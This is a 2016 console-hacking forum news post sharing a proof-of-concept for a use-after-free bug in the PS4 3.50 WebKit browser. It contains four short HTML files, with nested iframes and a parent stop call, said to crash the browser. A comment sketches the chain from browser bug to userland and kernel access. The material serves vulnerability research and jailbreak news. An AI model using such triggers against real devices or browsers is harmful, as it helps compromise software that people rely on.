Category PS4 Jailbreaking       Thread starter PSXHAX       Start date May 21, 2016 at 3:38 PM       30,333       49            
Well that didn't take long since news of the PS4 Webkit Exploit for 3.50 broke, with PlayStation 4 developer Hunter128 stepping up to the plate with the heap use-after-free at WebCore 3.50 proof-of-concept! :)

Without further ado, here's what he had to say to quote: Hello. Appears this needs to be posted public.. Not sure who felt the need to want fame for this cough "Qwerty" but that's the last time i am sharing something special like this.

Anyone hoping for advancements for the PS Vita scene you can blame this guy on why because i am no longer sharing anything.

Anywho make an index.html
Code:
<html>
  <body onload='runTest()'>
    <script>
      function runTest(){
       document.writeln('<html></html>');
      }
    </script>
  <iframe src='1.html'></iframe>
  </body>
</html>
1.html
Code:
<html>
  <iframe src='2.html'></iframe>
  <iframe src='3.html'></iframe>
</html>
2.html
Code:
<html>
  <script>
      window.parent.stop();
  </script>
</html>
3.html
Code:
<html>
</html>
Should cause a out of memory error.

Shoutout to no one.. I have no friends :eek:

Greetz to @Plankton in the PSXHAX Shoutbox today for the news!
PS4 Heap Use-After-Free At WebCore 3.50 PoC.jpg

Comments

PSXHAX

Staff Member
Contributor
Verified
Thanks @proskopina :D

We couldn't do it without all those helping with news in the Shoutbox though... what I normally do is check the Shoutbox from my phone throughout the day, and if there is news then I hop on the PC to post it. :cool:

mcmrc1

Contributor
Verified
i think it is in this direction ->

Find a Vuin -> If found like the Memory error -> Check if the Vuln is exploitable -> If so its a good sign -> Next step use a exploit to the vuln for an entry point -> entry point ok -> exploit for userland is needed -> if found -> use exploit for userland to gain kernel access -> now we have Kernel access but another exploit is needed for gain root or run own code....

Just my thinking it can be wrong maybe a dev (Mr Toolchain and Mrs Kernel aka @Chaos Kid aka CFWProphet ^^) could explain if this is ok....^^

Recent Articles
Sony PlayStation State of Play Live Stream for December 10th, 2019
Today as scheduled Sony held their last PlayStation State of Play December 2019 conference for the year, with a recap of the live stream and video game highlights below for those who missed it...
Redbox Video Game Rentals to End This Year, Game Sales by Early 2020
As GameStop reported massive financial losses and announced the closing of more stores this year, it appears Redbox is getting out of the video game rental business by the end of 2019... they'll...
Horizon: Zero Dawn Camera PS4 Hacks Demo by ManFightDragon
Proceeding his P.T. Silent Hills Demo Camera PS4 Hacks and MHW: Iceborne x Horizon Zero Dawn: The Frozen Wilds, PlayStation 4 video game hacker @manfightdragon is back with a Horizon: Zero Dawn...
Minecraft Bedrock Version on PS4 Features Cross-Play and Marketplace
Back in October we reported that PS4 Cross-Play exited the Beta stage and was available to all PlayStation 4 developers, and today Mojang officially announced that the Minecraft Bedrock Version...